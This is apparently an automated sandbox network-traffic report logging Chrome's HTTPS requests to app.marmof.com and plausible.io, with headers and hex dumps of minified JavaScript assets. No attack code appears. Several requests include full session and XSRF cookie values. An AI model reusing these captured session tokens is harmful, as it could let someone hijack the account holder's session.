                                                                                                                                              Data Ascii: n r==null||r!==r?o:r}var AS=yh(),PS=yh(!0);function gn(r){return r}function pf(r){return zd(typeof r=="function"?r:jn(r,m))}function OS(r){return Jd(jn(r,m))}function xS(r,o){return Xd(r,jn(o,m))}var TS=Ne(function(r,o){return function(u){return ma(u,r,o)
                                                                                                                                              2024-11-06 15:55:25 UTC16384INData Raw: 61 3d 6e 2e 64 6f 74 73 2c 6c 3d 6e 2e 69 6e 64 65 78 65 73 2c 66 3d 28 6e 2e 42 6c 6f 62 7c 7c 74 79 70 65 6f 66 20 42 6c 6f 62 3c 22 75 22 26 26 42 6c 6f 62 29 26 26 4a 2e 69 73 53 70 65 63 43 6f 6d 70 6c 69 61 6e 74 46 6f 72 6d 28 74 29 3b 69 66 28 21 4a 2e 69 73 46 75 6e 63 74 69 6f 6e 28 73 29 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 76 69 73 69 74 6f 72 20 6d 75 73 74 20 62 65 20 61 20 66 75 6e 63 74 69 6f 6e 22 29 3b 66 75 6e 63 74 69 6f 6e 20 68 28 76 29 7b 69 66 28 76 3d 3d 3d 6e 75 6c 6c 29 72 65 74 75 72 6e 22 22 3b 69 66 28 4a 2e 69 73 44 61 74 65 28 76 29 29 72 65 74 75 72 6e 20 76 2e 74 6f 49 53 4f 53 74 72 69 6e 67 28 29 3b 69 66 28 21 66 26 26 4a 2e 69 73 42 6c 6f 62 28 76 29 29 74 68 72 6f 77 20 6e 65 77 20 7a 65
                                                                                                                                              Data Ascii: a=n.dots,l=n.indexes,f=(n.Blob||typeof Blob<"u"&&Blob)&&J.isSpecCompliantForm(t);if(!J.isFunction(s))throw new TypeError("visitor must be a function");function h(v){if(v===null)return"";if(J.isDate(v))return v.toISOString();if(!f&&J.isBlob(v))throw new ze
                                                                                                                                              2024-11-06 15:55:25 UTC16384INData Raw: 3d 7b 75 72 6c 3a 61 2c 6d 65 74 68 6f 64 3a 61 2c 64 61 74 61 3a 61 2c 62 61 73 65 55 52 4c 3a 6c 2c 74 72 61 6e 73 66 6f 72 6d 52 65 71 75 65 73 74 3a 6c 2c 74 72 61 6e 73 66 6f 72 6d 52 65 73 70 6f 6e 73 65 3a 6c 2c 70 61 72 61 6d 73 53 65 72 69 61 6c 69 7a 65 72 3a 6c 2c 74 69 6d 65 6f 75 74 3a 6c 2c 74 69 6d 65 6f 75 74 4d 65 73 73 61 67 65 3a 6c 2c 77 69 74 68 43 72 65 64 65 6e 74 69 61 6c 73 3a 6c 2c 61 64 61 70 74 65 72 3a 6c 2c 72 65 73 70 6f 6e 73 65 54 79 70 65 3a 6c 2c 78 73 72 66 43 6f 6f 6b 69 65 4e 61 6d 65 3a 6c 2c 78 73 72 66 48 65 61 64 65 72 4e 61 6d 65 3a 6c 2c 6f 6e 55 70 6c 6f 61 64 50 72 6f 67 72 65 73 73 3a 6c 2c 6f 6e 44 6f 77 6e 6c 6f 61 64 50 72 6f 67 72 65 73 73 3a 6c 2c 64 65 63 6f 6d 70 72 65 73 73 3a 6c 2c 6d 61 78 43 6f 6e
                                                                                                                                              Data Ascii: ={url:a,method:a,data:a,baseURL:l,transformRequest:l,transformResponse:l,paramsSerializer:l,timeout:l,timeoutMessage:l,withCredentials:l,adapter:l,responseType:l,xsrfCookieName:l,xsrfHeaderName:l,onUploadProgress:l,onDownloadProgress:l,decompress:l,maxCon
                                                                                                                                              2024-11-06 15:55:25 UTC16384INData Raw: 6d 5b 30 5d 29 2c 67 28 6d 5b 31 5d 29 5d 3a 67 28 6d 29 2c 64 6f 6e 65 3a 5f 7d 7d 2c 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 7d 7d 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 69 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 2e 2e 2e 74 29 7b 72 65 74 75 72 6e 20 65 3d 3d 3d 22 64 65 6c 65 74 65 22 3f 21 31 3a 65 3d 3d 3d 22 63 6c 65 61 72 22 3f 76 6f 69 64 20 30 3a 74 68 69 73 7d 7d 66 75 6e 63 74 69 6f 6e 20 59 50 28 29 7b 63 6f 6e 73 74 20 65 3d 7b 67 65 74 28 61 29 7b 72 65 74 75 72 6e 20 59 75 28 74 68 69 73 2c 61 29 7d 2c 67 65 74 20 73 69 7a 65 28 29 7b 72 65 74 75 72 6e 20 5a 75 28 74 68 69 73 29 7d 2c 68 61 73 3a 51 75 2c 61 64 64 3a 46 67 2c 73 65 74 3a 4e 67 2c 64 65 6c 65 74 65 3a 4d
                                                                                                                                              Data Ascii: m[0]),g(m[1])]:g(m),done:_}},[Symbol.iterator](){return this}}}}function Ai(e){return function(...t){return e==="delete"?!1:e==="clear"?void 0:this}}function YP(){const e={get(a){return Yu(this,a)},get size(){return Zu(this)},has:Qu,add:Fg,set:Ng,delete:M
                                                                                                                                              2024-11-06 15:55:25 UTC16384INData Raw: 2c 74 2c 6e 2c 69 29 7b 63 6f 6e 73 74 20 73 3d 65 2e 64 69 72 73 2c 61 3d 74 26 26 74 2e 64 69 72 73 3b 66 6f 72 28 6c 65 74 20 6c 3d 30 3b 6c 3c 73 2e 6c 65 6e 67 74 68 3b 6c 2b 2b 29 7b 63 6f 6e 73 74 20 63 3d 73 5b 6c 5d 3b 61 26 26 28 63 2e 6f 6c 64 56 61 6c 75 65 3d 61 5b 6c 5d 2e 76 61 6c 75 65 29 3b 6c 65 74 20 66 3d 63 2e 64 69 72 5b 69 5d 3b 66 26 26 28 4e 73 28 29 2c 58 6e 28 66 2c 6e 2c 38 2c 5b 65 2e 65 6c 2c 63 2c 65 2c 74 5d 29 2c 4d 73 28 29 29 7d 7d 63 6f 6e 73 74 20 52 69 3d 53 79 6d 62 6f 6c 28 22 5f 6c 65 61 76 65 43 62 22 29 2c 69 6c 3d 53 79 6d 62 6f 6c 28 22 5f 65 6e 74 65 72 43 62 22 29 3b 66 75 6e 63 74 69 6f 6e 20 6e 76 28 29 7b 63 6f 6e 73 74 20 65 3d 7b 69 73 4d 6f 75 6e 74 65 64 3a 21 31 2c 69 73 4c 65 61 76 69 6e 67 3a 21 31
                                                                                                                                              Data Ascii: ,t,n,i){const s=e.dirs,a=t&&t.dirs;for(let l=0;l<s.length;l++){const c=s[l];a&&(c.oldValue=a[l].value);let f=c.dir[i];f&&(Ns(),Xn(f,n,8,[e.el,c,e,t]),Ms())}}const Ri=Symbol("_leaveCb"),il=Symbol("_enterCb");function nv(){const e={isMounted:!1,isLeaving:!1
                                                                                                                                              2024-11-06 15:55:25 UTC16384INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 73 78 28 65 2c 74 2c 6e 2c 69 3d 21 31 29 7b 63 6f 6e 73 74 20 73 3d 7b 7d 2c 61 3d 7b 7d 3b 50 6c 28 61 2c 75 63 2c 31 29 2c 65 2e 70 72 6f 70 73 44 65 66 61 75 6c 74 73 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 6e 75 6c 6c 29 2c 63 76 28 65 2c 74 2c 73 2c 61 29 3b 66 6f 72 28 63 6f 6e 73 74 20 6c 20 69 6e 20 65 2e 70 72 6f 70 73 4f 70 74 69 6f 6e 73 5b 30 5d 29 6c 20 69 6e 20 73 7c 7c 28 73 5b 6c 5d 3d 76 6f 69 64 20 30 29 3b 6e 3f 65 2e 70 72 6f 70 73 3d 69 3f 73 3a 75 4f 28 73 29 3a 65 2e 74 79 70 65 2e 70 72 6f 70 73 3f 65 2e 70 72 6f 70 73 3d 73 3a 65 2e 70 72 6f 70 73 3d 61 2c 65 2e 61 74 74 72 73 3d 61 7d 66 75 6e 63 74 69 6f 6e 20 61 78 28 65 2c 74 2c 6e 2c 69 29 7b 63 6f 6e 73 74 7b 70 72 6f 70 73 3a 73 2c 61 74
                                                                                                                                              Data Ascii: }function sx(e,t,n,i=!1){const s={},a={};Pl(a,uc,1),e.propsDefaults=Object.create(null),cv(e,t,s,a);for(const l in e.propsOptions[0])l in s||(s[l]=void 0);n?e.props=i?s:uO(s):e.type.props?e.props=s:e.props=a,e.attrs=a}function ax(e,t,n,i){const{props:s,at


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              12192.168.2.1849758159.69.48.314432212C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-11-06 15:55:25 UTC1263OUTGET /build/assets/Document-d618b903.js HTTP/1.1
                                                                                                                                              Host: app.marmof.com
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              Origin: https://app.marmof.com
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: XSRF-TOKEN=eyJpdiI6InZaRzZrNXZUQWpvRThHdStNbldvVHc9PSIsInZhbHVlIjoidXRzQ3FrdE85QnRmUGpwUmtZNUlWREIxNm5mM0liTStnTlFTWnRrUlRWMWc2eDZwcXJyUnBQdWVJOTVKMXFpeHFUMlZFRStqYmNTNWYzUE15SXZFVXBoeEo0c1I0RFc5d0U2cEUvdzVIbHNiQVF4SktoeERFbmZqZXp3Y0hxZ0EiLCJtYWMiOiI4NjY0N2JlYzE4NTNkMzkwZjRhOTIyZGUxMzRhNDkzNWE3OTA1NjZiMGE0NjMzYTM4MzE4NmJhY2MyYTQ4NzMwIiwidGFnIjoiIn0%3D; marmof_session=eyJpdiI6IkNoV3FFcHR3bkNtVnp3K2lpOTRLcVE9PSIsInZhbHVlIjoiZHpMRjZBTW9aamlYM3dHTkpBT011WFNiWHdVdVZibHR6YXg4TlBwNytLQlhaaHh5VGFld252NW9wajdsazBITjJ0K1IrWm9sMmZIb2lJRkFRNzQwa0FyVnFnQ0g1RUFwb1lkVStJaDJRTWRQUE9vUzNhZDZqa3p4ZWNLaXJwV0wiLCJtYWMiOiIyYTFkMTY5ZjhkMTIyYWM3Y2M4ZWMzMDA2ZmEwNjc5OTkxYTE5ZWUzNmFmMzMzN2NlOTM0NzRlMjg0ZWU1OWVlIiwidGFnIjoiIn0%3D
                                                                                                                                              2024-11-06 15:55:25 UTC373INHTTP/1.1 200 OK
                                                                                                                                              Server: nginx
                                                                                                                                              Date: Wed, 06 Nov 2024 15:55:25 GMT
                                                                                                                                              Content-Type: application/javascript; charset=utf-8
                                                                                                                                              Content-Length: 2155
                                                                                                                                              Last-Modified: Fri, 21 Jun 2024 14:30:40 GMT
                                                                                                                                              Connection: close
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              ETag: "66758e90-86b"
                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              2024-11-06 15:55:25 UTC2155INData Raw: 69 6d 70 6f 72 74 7b 70 20 61 73 20 6d 2c 6f 20 61 73 20 75 2c 64 20 61 73 20 78 2c 62 20 61 73 20 61 2c 75 20 61 73 20 74 2c 61 20 61 73 20 65 2c 77 20 61 73 20 72 2c 6e 20 61 73 20 6c 2c 74 20 61 73 20 6e 2c 46 20 61 73 20 68 2c 71 20 61 73 20 66 2c 5a 20 61 73 20 5f 2c 7a 20 61 73 20 69 2c 66 20 61 73 20 64 7d 66 72 6f 6d 22 2e 2f 61 70 70 2d 34 39 32 36 35 61 64 31 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 4c 20 61 73 20 70 7d 66 72 6f 6d 22 2e 2f 6c 6f 67 6f 74 79 70 65 2d 6f 72 69 67 69 6e 61 6c 2d 36 66 33 65 61 63 34 38 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 5f 20 61 73 20 67 7d 66 72 6f 6d 22 2e 2f 42 75 74 74 6f 6e 2d 37 63 30 34 37 35 61 39 2e 6a 73 22 3b 63 6f 6e 73 74 20 62 3d 7b 63 6c 61 73 73 3a 22 62 6f 72 64 65 72 2d 62 20 62 67 2d 67 72 61 79 2d
                                                                                                                                              Data Ascii: import{p as m,o as u,d as x,b as a,u as t,a as e,w as r,n as l,t as n,F as h,q as f,Z as _,z as i,f as d}from"./app-49265ad1.js";import{L as p}from"./logotype-original-6f3eac48.js";import{_ as g}from"./Button-7c0475a9.js";const b={class:"border-b bg-gray-


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              13192.168.2.1849757159.69.48.314432212C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-11-06 15:55:25 UTC1272OUTGET /build/assets/logotype-original-6f3eac48.js HTTP/1.1
                                                                                                                                              Host: app.marmof.com
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              Origin: https://app.marmof.com
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: XSRF-TOKEN=eyJpdiI6InZaRzZrNXZUQWpvRThHdStNbldvVHc9PSIsInZhbHVlIjoidXRzQ3FrdE85QnRmUGpwUmtZNUlWREIxNm5mM0liTStnTlFTWnRrUlRWMWc2eDZwcXJyUnBQdWVJOTVKMXFpeHFUMlZFRStqYmNTNWYzUE15SXZFVXBoeEo0c1I0RFc5d0U2cEUvdzVIbHNiQVF4SktoeERFbmZqZXp3Y0hxZ0EiLCJtYWMiOiI4NjY0N2JlYzE4NTNkMzkwZjRhOTIyZGUxMzRhNDkzNWE3OTA1NjZiMGE0NjMzYTM4MzE4NmJhY2MyYTQ4NzMwIiwidGFnIjoiIn0%3D; marmof_session=eyJpdiI6IkNoV3FFcHR3bkNtVnp3K2lpOTRLcVE9PSIsInZhbHVlIjoiZHpMRjZBTW9aamlYM3dHTkpBT011WFNiWHdVdVZibHR6YXg4TlBwNytLQlhaaHh5VGFld252NW9wajdsazBITjJ0K1IrWm9sMmZIb2lJRkFRNzQwa0FyVnFnQ0g1RUFwb1lkVStJaDJRTWRQUE9vUzNhZDZqa3p4ZWNLaXJwV0wiLCJtYWMiOiIyYTFkMTY5ZjhkMTIyYWM3Y2M4ZWMzMDA2ZmEwNjc5OTkxYTE5ZWUzNmFmMzMzN2NlOTM0NzRlMjg0ZWU1OWVlIiwidGFnIjoiIn0%3D
                                                                                                                                              2024-11-06 15:55:25 UTC374INHTTP/1.1 200 OK
                                                                                                                                              Server: nginx
                                                                                                                                              Date: Wed, 06 Nov 2024 15:55:25 GMT
                                                                                                                                              Content-Type: application/javascript; charset=utf-8
                                                                                                                                              Content-Length: 6332
                                                                                                                                              Last-Modified: Fri, 21 Jun 2024 14:30:40 GMT
                                                                                                                                              Connection: close
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              ETag: "66758e90-18bc"
                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              2024-11-06 15:55:25 UTC6332INData Raw: 69 6d 70 6f 72 74 7b 6f 20 61 73 20 43 2c 64 20 61 73 20 74 2c 61 63 20 61 73 20 56 7d 66 72 6f 6d 22 2e 2f 61 70 70 2d 34 39 32 36 35 61 64 31 2e 6a 73 22 3b 63 6f 6e 73 74 20 61 3d 7b 76 69 65 77 42 6f 78 3a 22 30 20 30 20 31 30 33 35 20 32 30 39 22 2c 66 69 6c 6c 3a 22 6e 6f 6e 65 22 2c 78 6d 6c 6e 73 3a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 7d 2c 6f 3d 56 28 27 3c 70 61 74 68 20 64 3d 22 4d 33 36 31 2e 36 34 35 20 36 37 2e 36 31 30 32 43 33 35 30 2e 36 39 36 20 35 37 2e 32 38 36 34 20 33 33 35 2e 33 32 38 20 35 32 2e 31 32 34 35 20 33 31 35 2e 36 31 38 20 35 32 2e 31 32 34 35 43 33 30 33 2e 36 31 33 20 35 32 2e 31 32 34 35 20 32 39 32 2e 39 37 37 20 35 34 2e 34 37 30 38 20 32 38 33 2e 36 36 39 20 35 39 2e
                                                                                                                                              Data Ascii: import{o as C,d as t,ac as V}from"./app-49265ad1.js";const a={viewBox:"0 0 1035 209",fill:"none",xmlns:"http://www.w3.org/2000/svg"},o=V('<path d="M361.645 67.6102C350.696 57.2864 335.328 52.1245 315.618 52.1245C303.613 52.1245 292.977 54.4708 283.669 59.


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              14192.168.2.1849756159.69.48.314432212C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-11-06 15:55:25 UTC1261OUTGET /build/assets/Button-7c0475a9.js HTTP/1.1
                                                                                                                                              Host: app.marmof.com
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              Origin: https://app.marmof.com
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: XSRF-TOKEN=eyJpdiI6InZaRzZrNXZUQWpvRThHdStNbldvVHc9PSIsInZhbHVlIjoidXRzQ3FrdE85QnRmUGpwUmtZNUlWREIxNm5mM0liTStnTlFTWnRrUlRWMWc2eDZwcXJyUnBQdWVJOTVKMXFpeHFUMlZFRStqYmNTNWYzUE15SXZFVXBoeEo0c1I0RFc5d0U2cEUvdzVIbHNiQVF4SktoeERFbmZqZXp3Y0hxZ0EiLCJtYWMiOiI4NjY0N2JlYzE4NTNkMzkwZjRhOTIyZGUxMzRhNDkzNWE3OTA1NjZiMGE0NjMzYTM4MzE4NmJhY2MyYTQ4NzMwIiwidGFnIjoiIn0%3D; marmof_session=eyJpdiI6IkNoV3FFcHR3bkNtVnp3K2lpOTRLcVE9PSIsInZhbHVlIjoiZHpMRjZBTW9aamlYM3dHTkpBT011WFNiWHdVdVZibHR6YXg4TlBwNytLQlhaaHh5VGFld252NW9wajdsazBITjJ0K1IrWm9sMmZIb2lJRkFRNzQwa0FyVnFnQ0g1RUFwb1lkVStJaDJRTWRQUE9vUzNhZDZqa3p4ZWNLaXJwV0wiLCJtYWMiOiIyYTFkMTY5ZjhkMTIyYWM3Y2M4ZWMzMDA2ZmEwNjc5OTkxYTE5ZWUzNmFmMzMzN2NlOTM0NzRlMjg0ZWU1OWVlIiwidGFnIjoiIn0%3D
                                                                                                                                              2024-11-06 15:55:25 UTC373INHTTP/1.1 200 OK
                                                                                                                                              Server: nginx
                                                                                                                                              Date: Wed, 06 Nov 2024 15:55:25 GMT
                                                                                                                                              Content-Type: application/javascript; charset=utf-8
                                                                                                                                              Content-Length: 3018
                                                                                                                                              Last-Modified: Fri, 21 Jun 2024 14:30:40 GMT
                                                                                                                                              Connection: close
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              ETag: "66758e90-bca"
                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              2024-11-06 15:55:25 UTC3018INData Raw: 69 6d 70 6f 72 74 7b 6f 20 61 73 20 64 2c 64 20 61 73 20 61 2c 65 20 61 73 20 63 2c 6c 2c 6e 20 61 73 20 69 7d 66 72 6f 6d 22 2e 2f 61 70 70 2d 34 39 32 36 35 61 64 31 2e 6a 73 22 3b 63 6f 6e 73 74 20 75 3d 5b 22 74 79 70 65 22 2c 22 64 69 73 61 62 6c 65 64 22 5d 2c 79 3d 7b 6b 65 79 3a 30 2c 63 6c 61 73 73 3a 22 69 2d 65 6f 73 2d 69 63 6f 6e 73 3a 62 75 62 62 6c 65 2d 6c 6f 61 64 69 6e 67 20 62 6c 6f 63 6b 20 68 2d 33 20 77 2d 33 22 7d 2c 68 3d 7b 5f 5f 6e 61 6d 65 3a 22 42 75 74 74 6f 6e 22 2c 70 72 6f 70 73 3a 7b 63 6f 6c 6f 72 3a 7b 74 79 70 65 3a 53 74 72 69 6e 67 2c 64 65 66 61 75 6c 74 3a 22 70 72 69 6d 61 72 79 22 7d 2c 73 69 7a 65 3a 7b 74 79 70 65 3a 53 74 72 69 6e 67 2c 64 65 66 61 75 6c 74 3a 22 6d 64 22 7d 2c 72 6f 75 6e 64 65 64 3a 7b 74 79
                                                                                                                                              Data Ascii: import{o as d,d as a,e as c,l,n as i}from"./app-49265ad1.js";const u=["type","disabled"],y={key:0,class:"i-eos-icons:bubble-loading block h-3 w-3"},h={__name:"Button",props:{color:{type:String,default:"primary"},size:{type:String,default:"md"},rounded:{ty


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              15192.168.2.1849759169.150.236.1044432212C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-11-06 15:55:25 UTC594OUTPOST /api/event HTTP/1.1
                                                                                                                                              Host: plausible.io
                                                                                                                                              Connection: keep-alive
                                                                                                                                              Content-Length: 96
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              Content-Type: text/plain
                                                                                                                                              Accept: */*
                                                                                                                                              Origin: https://app.marmof.com
                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                              Referer: https://app.marmof.com/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2024-11-06 15:55:25 UTC96OUTData Raw: 7b 22 6e 22 3a 22 70 61 67 65 76 69 65 77 22 2c 22 75 22 3a 22 68 74 74 70 73 3a 2f 2f 61 70 70 2e 6d 61 72 6d 6f 66 2e 63 6f 6d 2f 73 68 61 72 65 2f 30 31 6a 63 30 77 7a 70 74 70 79 37 62 65 70 76 7a 6b 34 6e 65 72 37 64 63 35 22 2c 22 64 22 3a 6e 75 6c 6c 2c 22 72 22 3a 6e 75 6c 6c 7d
                                                                                                                                              Data Ascii: {"n":"pageview","u":"https://app.marmof.com/share/01jc0wzptpy7bepvzk4ner7dc5","d":null,"r":null}
                                                                                                                                              2024-11-06 15:55:25 UTC718INHTTP/1.1 202 Accepted
                                                                                                                                              Date: Wed, 06 Nov 2024 15:55:25 GMT
                                                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                                                              Content-Length: 2
                                                                                                                                              Connection: close
                                                                                                                                              Server: BunnyCDN-IL1-1206
                                                                                                                                              CDN-PullZone: 682664
                                                                                                                                              CDN-Uid: 153cb5b1-399a-48ef-b5bf-098c03770254
                                                                                                                                              CDN-RequestCountryCode: US
                                                                                                                                              Access-Control-Allow-Credentials: true
                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                              Cache-Control: must-revalidate, max-age=0, private
                                                                                                                                              application: 127.0.0.1
                                                                                                                                              permissions-policy: interest-cohort=()
                                                                                                                                              x-plausible-dropped: 1
                                                                                                                                              X-Request-ID: GAVsIh4G1v9B4joAbhMw
                                                                                                                                              CDN-ProxyVer: 1.06
                                                                                                                                              CDN-RequestPullSuccess: True
                                                                                                                                              CDN-RequestPullCode: 202
                                                                                                                                              CDN-CachedAt: 11/06/2024 15:55:25
                                                                                                                                              CDN-EdgeStorageId: 1206
                                                                                                                                              CDN-RequestTime: 0
                                                                                                                                              CDN-RequestId: e2a406f3c212b7252fb301aa1f00bfab
                                                                                                                                              2024-11-06 15:55:25 UTC2INData Raw: 6f 6b
                                                                                                                                              Data Ascii: ok


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              16192.168.2.1849760169.150.221.1474432212C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-11-06 15:55:25 UTC348OUTGET /js/script.js HTTP/1.1
                                                                                                                                              Host: plausible.io
                                                                                                                                              Connection: keep-alive
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2024-11-06 15:55:25 UTC747INHTTP/1.1 200 OK
                                                                                                                                              Date: Wed, 06 Nov 2024 15:55:25 GMT
                                                                                                                                              Content-Type: application/javascript
                                                                                                                                              Content-Length: 1407
                                                                                                                                              Connection: close
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              Server: BunnyCDN-SIL1-915
                                                                                                                                              CDN-PullZone: 682664
                                                                                                                                              CDN-Uid: 153cb5b1-399a-48ef-b5bf-098c03770254
                                                                                                                                              CDN-RequestCountryCode: US
                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                              Cache-Control: public, must-revalidate, max-age=86400
                                                                                                                                              application: 127.0.0.1
                                                                                                                                              cross-origin-resource-policy: cross-origin
                                                                                                                                              permissions-policy: interest-cohort=()
                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                              CDN-ProxyVer: 1.06
                                                                                                                                              CDN-RequestPullSuccess: True
                                                                                                                                              CDN-RequestPullCode: 200
                                                                                                                                              CDN-CachedAt: 11/06/2024 12:59:54
                                                                                                                                              CDN-EdgeStorageId: 915
                                                                                                                                              CDN-Status: 200
                                                                                                                                              CDN-RequestTime: 1
                                                                                                                                              CDN-RequestId: f17b8a6344e9dbcb485316d282c66dfb
                                                                                                                                              CDN-Cache: HIT
                                                                                                                                              2024-11-06 15:55:25 UTC1407INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 61 3d 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2c 6f 3d 77 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 2c 74 3d 6f 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 2c 72 3d 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 61 70 69 22 29 7c 7c 6e 65 77 20 55 52 4c 28 74 2e 73 72 63 29 2e 6f 72 69 67 69 6e 2b 22 2f 61 70 69 2f 65 76 65 6e 74 22 2c 6c 3d 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 64 6f 6d 61 69 6e 22 29 3b 66 75 6e 63 74 69 6f 6e 20 73 28 74 2c 65 29 7b 74 26 26 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 49 67 6e 6f 72 69 6e 67 20 45 76 65 6e 74 3a 20 22 2b 74 29 2c 65 26 26 65 2e 63 61 6c 6c 62 61 63 6b 26 26 65 2e 63 61 6c 6c
                                                                                                                                              Data Ascii: !function(){"use strict";var a=window.location,o=window.document,t=o.currentScript,r=t.getAttribute("data-api")||new URL(t.src).origin+"/api/event",l=t.getAttribute("data-domain");function s(t,e){t&&console.warn("Ignoring Event: "+t),e&&e.callback&&e.call


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              17192.168.2.1849762159.69.48.314432212C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
